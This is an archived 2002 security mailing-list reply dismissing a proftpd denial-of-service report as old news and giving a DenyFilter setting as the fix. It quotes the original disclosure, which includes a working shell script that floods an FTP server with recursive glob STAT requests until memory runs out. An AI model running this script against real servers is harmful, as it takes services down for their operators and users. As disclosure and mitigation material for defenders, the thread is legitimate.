This is so old I can't even find any postings/articles I remember making on it. Here is one link from early last year: http://lwn.net/2001/0322/a/proftpd-dos.php3 Check the documentation: DenyFilter \*.*/ Problem solved. People should search Google before posting, it's far less embaressing. Kurt Seifried, kurt@seifried.org A15B BEE5 B391 B9AD B0EF AEB0 AD63 0B4E AD56 E574 http://seifried.org/security/ ----- Original Message ----- From: "Rob klein Gunnewiek" <rmkleing@hio.hen.nl> To: <bugtraq@securityfocus.com>; <vulnwatch@vulnwatch.org> Sent: Sunday, December 08, 2002 4:53 AM Subject: [VulnWatch] proftpd <=1.2.7rc3 DoS > Hello, > > proftpd is vulnerable to denial of service similar to the list > */../*/../*/../*. > > #!/bin/sh > # > # proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least > # might work against many other FTP daemons > # consumes nearly all memory and alot of CPU > # > # tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3 > # > # 7-dec-02 - detach - www.duho.org > # > # use: ./prodos.sh <host> <user> <pass> > # do this some more to make sure the system eventually dies > > cnt=25 > while [ $cnt -gt 0 ] ; do > ftp -n << EOF& > o $1 > quote user $2 > quote pass $3 > quote stat /*/*/*/*/*/*/* > quit > EOF > let cnt=cnt-1 > done > sleep 2 > killall -9 ftp > echo DONE! > > #end >
